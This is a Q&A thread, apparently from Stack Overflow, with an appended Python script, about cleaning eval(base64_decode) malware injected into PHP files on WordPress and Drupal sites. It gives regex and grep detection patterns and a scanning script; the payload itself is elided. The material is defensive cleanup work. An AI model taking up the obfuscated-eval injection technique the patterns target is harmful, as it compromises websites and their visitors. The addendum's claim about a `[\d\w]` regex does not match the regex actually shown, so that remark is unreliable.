I've been having issues on my server with the following PHP inserted in all of my Drupal and Wordpress sites.

I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.

My question is:

Using Notepad++ is there a *.* style search criteria I could use to scan my backup files and delete the lines of malicious code without having to do them all individually on my local machine?

This would clearly save me loads of time. Up to now, I've been replacing the following code with blank but the eval code varies on each of my sites.

eval(base64_decode("..."));
kenorb
    possible duplicate of [eval base64_decode php virus](http://stackoverflow.com/questions/5922762/eval-base64-decode-php-virus) – PeeHaa Feb 06 '12 at 14:10
    You should find out what hole is being exploited to hack into your website and fix it. Else it will be re-hacked at some point. – igorw Feb 06 '12 at 14:12

3 Answers

I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.

Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.

As far as searching goes a regex like this should sort it out:

eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);
Treffynnon

I've also had the same problem with my WordPress blogs, the eval base64_decode hack. The PHP files were being injected with those eval lines. I suggest you reinstall WordPress/Drupal, as some other scripts may already be present in your site, then change all passwords.

Try running grep through SSH, e.g. grep -r -H "eval(base64_decode" . It'll show you which files are infected. Then, if you have time, automate the process so you will be notified in case it happens again.

And in the future, always update WordPress/Drupal.

gerky

It's easier if you can use special tools to remove this malicious code, because it could be tricky to find the actual regex to match all the code, and you never know whether that worked or whether you broke your site. Especially when you have multiple files, you should identify the suspicious files with the following commands:

grep -R "eval.*base64_decode" .
grep -R "return.*base64_decode" .

but that may not be enough, so you should also consider using these PHP security scanners.

For more details, check: How to get rid of eval-base64_decode like PHP virus files?.

For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?

kenorb
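As an added example (not code from any of the answers above), the following Python script combines the regex approach from Treffynnon's answer with the recursive file search from the grep commands: it widens the character class to the full base64 alphabet (including "+", "/" and "=" padding, which `[\d\w]` would miss), reports each hit with its line number, and strips the injected statement while keeping any legitimate code that shares the line. The file and function names and the sample PHP content are constructed for this illustration.

```python
import re
from pathlib import Path

# Constructed sample of an infected PHP file (the base64 token is made up,
# not a real payload); mirrors the one-line injection the question shows.
SAMPLE_INFECTED = (
    '<?php\n'
    'eval(base64_decode("Q09OU1RSVUNURUQrU0FNUExFLz0="));\n'
    '/**\n * Plugin Name: Example\n */\n'
    'function hello() { return "hi"; }\n'
)

# Full base64 alphabet so payloads containing + / = are not skipped;
# optional whitespace and either quote style are tolerated.
INJECTION_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?'
)


def find_injections(text):
    """Return (line_number, matched_text) for every injected statement."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = INJECTION_RE.search(line)
        if m:
            hits.append((lineno, m.group(0)))
    return hits


def strip_injections(text):
    """Remove injected statements; drop a line only if nothing else was on it."""
    out, removed = [], 0
    for line in text.splitlines(keepends=True):
        new_line, n = INJECTION_RE.subn('', line)
        removed += n
        if n and new_line.strip() == '':
            continue  # the whole line was the injection
        out.append(new_line)
    return ''.join(out), removed


def scan_tree(root):
    """Read-only walk over *.php files under root, keyed by path -> hits."""
    report = {}
    for path in Path(root).rglob('*.php'):
        hits = find_injections(path.read_text(errors='replace'))
        if hits:
            report[str(path)] = hits
    return report


if __name__ == '__main__':
    cleaned, n = strip_injections(SAMPLE_INFECTED)
    print(f'removed {n} injected statement(s)')
    print(cleaned)
```

Run scan_tree on the unpacked backup first and review the report before writing anything back; the strip step only removes the eval(base64_decode(...)) statement itself, so other injected code (as the answers warn) still needs a reinstall.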